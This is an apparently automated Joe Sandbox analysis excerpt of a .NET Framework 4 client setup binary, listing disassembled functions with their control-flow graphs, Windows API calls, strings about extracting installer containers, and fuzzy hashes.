                                                                                                                                                                    control_flow_graph 399 1621f-1624f GetProcessHeap HeapAlloc 400 16251-1625b 399->400 401 16260-16268 399->401 402 163ed-163f4 call 1854a 400->402 403 162fd-16305 401->403 404 1626e 401->404 415 163f5 call 168fb 402->415 406 16353-1635e call 1676f 403->406 407 16307-1632e GetProcessHeap HeapAlloc 403->407 405 16271-1627a call 19dc6 404->405 414 1627f-16283 405->414 416 16360-16365 406->416 417 1636a-16389 call 184c7 call 169b0 406->417 407->406 410 16330-1633a 407->410 410->402 418 16289-1629a call 19ef3 414->418 419 1633f-16344 414->419 421 163fa-163ff 415->421 416->402 441 163d8-163e6 call 169b0 call 169e3 417->441 442 1638b-16394 call 169e3 417->442 431 162a0-162a4 418->431 432 16349-1634e 418->432 419->402 424 16401-16407 421->424 425 1643c-16442 421->425 428 16421-16435 GetProcessHeap HeapFree 424->428 429 16409-16411 424->429 428->425 438 16437 call 19a29 428->438 435 16413 call 1a46e 429->435 436 16418-1641f 429->436 433 162a6-162ac 431->433 434 162ae-162b9 431->434 432->402 439 162bb-162c0 433->439 434->439 435->436 436->428 436->429 438->425 444 162c2-162c5 439->444 445 162e7-162f7 439->445 441->421 455 163e8 441->455 454 16396-16399 442->454 442->455 448 162c8-162cc 444->448 445->403 445->405 451 162d3-162df 448->451 452 162ce-162d1 448->452 456 162e1-162e5 451->456 452->456 458 163b0-163b9 call 169e3 454->458 459 1639b-163aa call 1a003 454->459 455->402 456->445 456->448 458->455 464 163bb-163c7 call 1a222 458->464 459->458 465 16445-1644b 459->465 468 163cc-163d0 464->468 467 16453-1645c call 1854a 465->467 467->415 470 163d2-163d6 468->470 471 1644d-1644e 468->471 470->441 470->442 471->467
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,00000000,74DF23A0,00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001623D
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016244
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001631A
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016321
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016426
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001642D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to extract all files out of box container #%d., xrefs: 0001644E
                                                                                                                                                                    • Failed to start reporting progress, xrefs: 00016360
                                                                                                                                                                    • User canceled extraction..., xrefs: 000163E8
                                                                                                                                                                    • Failed to allocate memory to hold container handles., xrefs: 00016256
                                                                                                                                                                    • Extracting files to: %S, xrefs: 0001636D
                                                                                                                                                                    • Failed to open container., xrefs: 0001633F
                                                                                                                                                                    • Failed to alloc cleanup list buffer, xrefs: 00016335
                                                                                                                                                                    • Failed to read container header., xrefs: 00016349
                                                                                                                                                                    • Failed to verify box container #%d., xrefs: 00016446
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                    • String ID: Extracting files to: %S$Failed to alloc cleanup list buffer$Failed to allocate memory to hold container handles.$Failed to extract all files out of box container #%d.$Failed to open container.$Failed to read container header.$Failed to start reporting progress$Failed to verify box container #%d.$User canceled extraction...
                                                                                                                                                                    • API String ID: 1864747095-3704756192
                                                                                                                                                                    • Opcode ID: 40eddf589476ecd3fecaf425de5638178d0c40e28d40ec5b4fd2e31b69c72c4f
                                                                                                                                                                    • Instruction ID: 386b44b61681ad396e3acba269ff004272dd2d013e504b1519300cf742e22d1f
                                                                                                                                                                    • Opcode Fuzzy Hash: 40eddf589476ecd3fecaf425de5638178d0c40e28d40ec5b4fd2e31b69c72c4f
                                                                                                                                                                    • Instruction Fuzzy Hash: 16619332D00626ABDB219F98CC85AEEB7B4FF44710F154165FA11AB252DB72DEC0C7A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001751D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 128encryptionCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 504 1751d-17560 CryptAcquireContextA 505 17562-1756c GetLastError 504->505 506 1758d-1759e CryptGenRandom 504->506 509 1757c 505->509 510 1756e-1757a 505->510 507 175a0-175aa GetLastError 506->507 508 175cb-175df 506->508 511 175ba 507->511 512 175ac-175b8 507->512 513 175e1-17606 call 18b7e 508->513 514 17657-1765c 508->514 515 17583-17588 509->515 516 1757e 509->516 510->509 518 175c1-175c6 511->518 519 175bc 511->519 512->511 528 17643-17648 513->528 529 17608-1760b 513->529 521 17668-1766b 514->521 522 1765e-17662 CryptReleaseContext 514->522 517 1764f-17656 call 1854a 515->517 516->515 517->514 518->517 519->518 525 17675-17685 call 291d5 521->525 526 1766d-17670 call 18e6f 521->526 522->521 526->525 528->517 533 17614-17624 call 18abb 529->533 534 1760d-17612 529->534 539 17626-1762a 533->539 540 1764a 533->540 535 17634-1763f 534->535 535->513 537 17641 535->537 537->514 539->535 541 1762c-1762f call 18e6f 539->541 540->517 541->535
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,X?f,?,?,?,?,?,X?f), ref: 00017558
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00017562
                                                                                                                                                                    • CryptGenRandom.ADVAPI32(?,00000010,?), ref: 00017596
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000175A0
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00017662
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to generate a random value, xrefs: 000175C1
                                                                                                                                                                    • X?f, xrefs: 00017532
                                                                                                                                                                    • %02x, xrefs: 000175F4
                                                                                                                                                                    • Failed to allocate formatted current byte for the random string, xrefs: 00017643
                                                                                                                                                                    • Failed to concatenate the formatted byte to the random string, xrefs: 0001764A
                                                                                                                                                                    • Failed to acquire Crypto context, xrefs: 00017583
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Crypt$ContextErrorLast$AcquireRandomRelease
                                                                                                                                                                    • String ID: %02x$Failed to acquire Crypto context$Failed to allocate formatted current byte for the random string$Failed to concatenate the formatted byte to the random string$Failed to generate a random value$X?f
                                                                                                                                                                    • API String ID: 236824231-2443091033
                                                                                                                                                                    • Opcode ID: 96d39745c9bb4000323314d7b3ee01d3254e479b79b99c0fef67b24b68f80861
                                                                                                                                                                    • Instruction ID: ae369d87006d9a854760aff15cb14178b6aa2feb50fdeb705dcfe9feeae9dd0c
                                                                                                                                                                    • Opcode Fuzzy Hash: 96d39745c9bb4000323314d7b3ee01d3254e479b79b99c0fef67b24b68f80861
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A411972D0861AAFDB219BA8CC05BFEFBF5AF18340F154026E905B7191D7B84E80CB95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017C12 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 56libraryfileloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 543 17c12-17c1e 544 17c20-17c2d LoadLibraryW 543->544 545 17c8c-17c99 DecryptFileW 543->545 548 17c53-17c66 GetProcAddress 544->548 549 17c2f-17c37 GetLastError 544->549 546 17cc5-17cc8 545->546 547 17c9b-17ca3 GetLastError 545->547 553 17cb1 547->553 554 17ca5-17caf 547->554 548->545 552 17c68-17c70 GetLastError 548->552 550 17c45 549->550 551 17c39-17c43 549->551 555 17c47 550->555 556 17c4c-17c51 550->556 551->550 557 17c72-17c7c 552->557 558 17c7e 552->558 559 17cb3 553->559 560 17cb8 553->560 554->553 555->556 561 17cbd-17cc4 call 1854a 556->561 557->558 562 17c80 558->562 563 17c85-17c8a 558->563 559->560 560->561 561->546 562->563 563->561
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?), ref: 00017C25
                                                                                                                                                                    • GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C2F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileW), ref: 00017C59
                                                                                                                                                                    • GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C68
                                                                                                                                                                    • DecryptFileW.ADVAPI32(?,00000000), ref: 00017C91
                                                                                                                                                                    • GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C9B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to load DecryptFileW from advapi.dll, xrefs: 00017C85
                                                                                                                                                                    • DecryptFileW, xrefs: 00017C53
                                                                                                                                                                    • advapi32.dll, xrefs: 00017C20
                                                                                                                                                                    • Failed to load advapi32.dll, xrefs: 00017C4C
                                                                                                                                                                    • Failed to decrypt the extract directory, xrefs: 00017CB8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressDecryptFileLibraryLoadProc
                                                                                                                                                                    • String ID: DecryptFileW$Failed to decrypt the extract directory$Failed to load DecryptFileW from advapi.dll$Failed to load advapi32.dll$advapi32.dll
                                                                                                                                                                    • API String ID: 156776402-3428403797
                                                                                                                                                                    • Opcode ID: 15edc2da5a99a366a1b840b7d24b4557f359ebc6fad2660161e5426f66516693
                                                                                                                                                                    • Instruction ID: a74ad02cb0c8e98d2a12842606b58fe897826fe5f3a46dc3251d7b8db2a232c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 15edc2da5a99a366a1b840b7d24b4557f359ebc6fad2660161e5426f66516693
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B116D72B882029BF3651B71AD0ABE63AE85F11784F25803CBB0DDA1A1E7ADC4C05695
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001F9FE Relevance: 16.8, APIs: 7, Strings: 2, Instructions: 1051COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?), ref: 0002003F
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 00020592
                                                                                                                                                                      • Part of subcall function 00022B6C: __EH_prolog3.LIBCMT ref: 00022B73
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 00020433
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?), ref: 0002070F
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 000208F7
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?), ref: 00020AE6
                                                                                                                                                                      • Part of subcall function 00028513: __EH_prolog3.LIBCMT ref: 0002851D
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00020B37
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalDeleteSection$H_prolog3$Exception@8Throw_malloc
                                                                                                                                                                    • String ID: ($)
                                                                                                                                                                    • API String ID: 3630289165-2051389312
                                                                                                                                                                    • Opcode ID: 082a5472a51113d65de4865b1bec6b357bb7a66d07f40c886240ab71edd6b662
                                                                                                                                                                    • Instruction ID: 9ab64b030c0eb6d3187c6d4393b8fa52969780e1919161d3ab27410f3d8218e4
                                                                                                                                                                    • Opcode Fuzzy Hash: 082a5472a51113d65de4865b1bec6b357bb7a66d07f40c886240ab71edd6b662
                                                                                                                                                                    • Instruction Fuzzy Hash: 40B23071508386CFD371DF68D488BDABBE4BF89304F04496EE58D87252CB71A889CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00024252 Relevance: 14.8, APIs: 7, Strings: 1, Instructions: 792COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_
                                                                                                                                                                    • String ID: "
                                                                                                                                                                    • API String ID: 2427045233-123907689
                                                                                                                                                                    • Opcode ID: 68dd5cce31387cd42ae8f98b2d7aea574bf8d53defb8944c716c39a1faee40af
                                                                                                                                                                    • Instruction ID: 2ed4cf0f57dd86fb95ad4763dee69314176b42c612a0742204f20140bdeb1538
                                                                                                                                                                    • Opcode Fuzzy Hash: 68dd5cce31387cd42ae8f98b2d7aea574bf8d53defb8944c716c39a1faee40af
                                                                                                                                                                    • Instruction Fuzzy Hash: BC725870508391DFD721DF68D488B9EBBE4BF89304F144A6DE5C98B252CB74E845CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017A0A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDriveTypeW.KERNELBASE(00017887,00000000,?), ref: 00017A32
                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000), ref: 00017A50
                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000), ref: 00017A59
                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00017A8B
                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00017AB0
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00017AC5
                                                                                                                                                                    • SetErrorMode.KERNELBASE(?), ref: 00017ACE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorMode$CloseControlCreateDeviceDriveFileHandleType
                                                                                                                                                                    • String ID: \\.\?:
                                                                                                                                                                    • API String ID: 1714706890-2364848050
                                                                                                                                                                    • Opcode ID: 20494446aace7ba285ae001ddc003272d3548e84437932189a2761f4dd282c2d
                                                                                                                                                                    • Instruction ID: 956f9dc3a99f5f3c13a446916467ae807bc69e785a01f97a5876735f7fa75d21
                                                                                                                                                                    • Opcode Fuzzy Hash: 20494446aace7ba285ae001ddc003272d3548e84437932189a2761f4dd282c2d
                                                                                                                                                                    • Instruction Fuzzy Hash: FA216D71D04219BBDB26DFA5EC48ADEBBB9EF89320F004415F605E7190D7B19681CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000184C7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
                                                                                                                                                                    • swprintf.LIBCMT ref: 00018513
                                                                                                                                                                      • Part of subcall function 0001870C: lstrlenA.KERNEL32(00000000,00000004,?,?,0003C170,?,?,?,?,000184C0,?,?,00000000,?,00018526,?), ref: 00018738
                                                                                                                                                                      • Part of subcall function 0001870C: WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018762
                                                                                                                                                                      • Part of subcall function 0001870C: WriteFile.KERNELBASE(00014DA4,00000002,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018787
                                                                                                                                                                      • Part of subcall function 0001870C: GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0001878D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite$ErrorLastLocalTimelstrlenswprintf
                                                                                                                                                                    • String ID: %u/%u/%u, %u:%u:%u$[%s]
                                                                                                                                                                    • API String ID: 4160318958-2469116371
                                                                                                                                                                    • Opcode ID: f0b53fd557eb7ff790b60228a738f7f2dd802c4db6624ecc35ed11c5142fd40a
                                                                                                                                                                    • Instruction ID: 01829ff85255d32666ff3563b37627df478823d167ddb5afd7cc706eb89fe84a
                                                                                                                                                                    • Opcode Fuzzy Hash: f0b53fd557eb7ff790b60228a738f7f2dd802c4db6624ecc35ed11c5142fd40a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A017C71900118BADB01EF969C05EFFB7BCAF49B14F000062FA40E6081D638DE81D771
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018E9C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?), ref: 00018EB8
                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00018EC2
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00018ED7
                                                                                                                                                                    Strings
                                                                                                                                                                    • %04d/%02d/%02d %02d:%02d:%02d, xrefs: 00018EFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$System$InformationLocalSpecificZone
                                                                                                                                                                    • String ID: %04d/%02d/%02d %02d:%02d:%02d
                                                                                                                                                                    • API String ID: 1716759327-2911751566
                                                                                                                                                                    • Opcode ID: 5465d8fddbcafff6de9e5f4c851abd281daa005fb273f1ff56ba463421be478f
                                                                                                                                                                    • Instruction ID: 5d355f3bcbb021d71997bff1411340ff526b78e342f6c44673e9bbbd3d0040f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 5465d8fddbcafff6de9e5f4c851abd281daa005fb273f1ff56ba463421be478f
                                                                                                                                                                    • Instruction Fuzzy Hash: 5201D6B290011DBACB10DBD5D949AFFB7FCAF0C605F004056FA45E2040EA38AA44DB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00022056 Relevance: 3.6, APIs: 2, Instructions: 585COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00022060
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00022229
                                                                                                                                                                      • Part of subcall function 00033B07: RaiseException.KERNEL32(?,?,00033665,?,?,?,?,?,00033665,?,00037124,0003BE98), ref: 00033B49
                                                                                                                                                                      • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
                                                                                                                                                                      • Part of subcall function 000335E6: std::exception::exception.LIBCMT ref: 00033635
                                                                                                                                                                      • Part of subcall function 000335E6: std::exception::exception.LIBCMT ref: 0003364F
                                                                                                                                                                      • Part of subcall function 000335E6: __CxxThrowException@8.LIBCMT ref: 00033660
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$ExceptionH_prolog3_catchRaise_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1092593795-0
                                                                                                                                                                    • Opcode ID: 6b606f6b34fe14e6922f9ca1e3bcc7bd2597f23bcde83e1ac32166426de71521
                                                                                                                                                                    • Instruction ID: be343213af3a4bbbf4bf8bd988f1d5e939742fe9972562866f52b8ffdda522ed
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b606f6b34fe14e6922f9ca1e3bcc7bd2597f23bcde83e1ac32166426de71521
                                                                                                                                                                    • Instruction Fuzzy Hash: E0426C70900269EFCB11CFA8D588ADDBBF4BF59304F248189E449AB352D775AE85CF60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00020BD0 Relevance: 3.6, APIs: 2, Instructions: 576COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3670251406-0
                                                                                                                                                                    • Opcode ID: 1a6ce538c6e160e7d11cd33444db61de811534d95da30615c48675af8884f794
                                                                                                                                                                    • Instruction ID: 750e83e6c5202139df6214a471fc2b223f4abc04444227b7ea17c5fa21cf1bf2
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a6ce538c6e160e7d11cd33444db61de811534d95da30615c48675af8884f794
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A425271D00269DFCF60DF94D880ADDBBB5BF18310F1581AAE549AB252D730AE85CF91
                                                                                                                                                                    Uniqueness

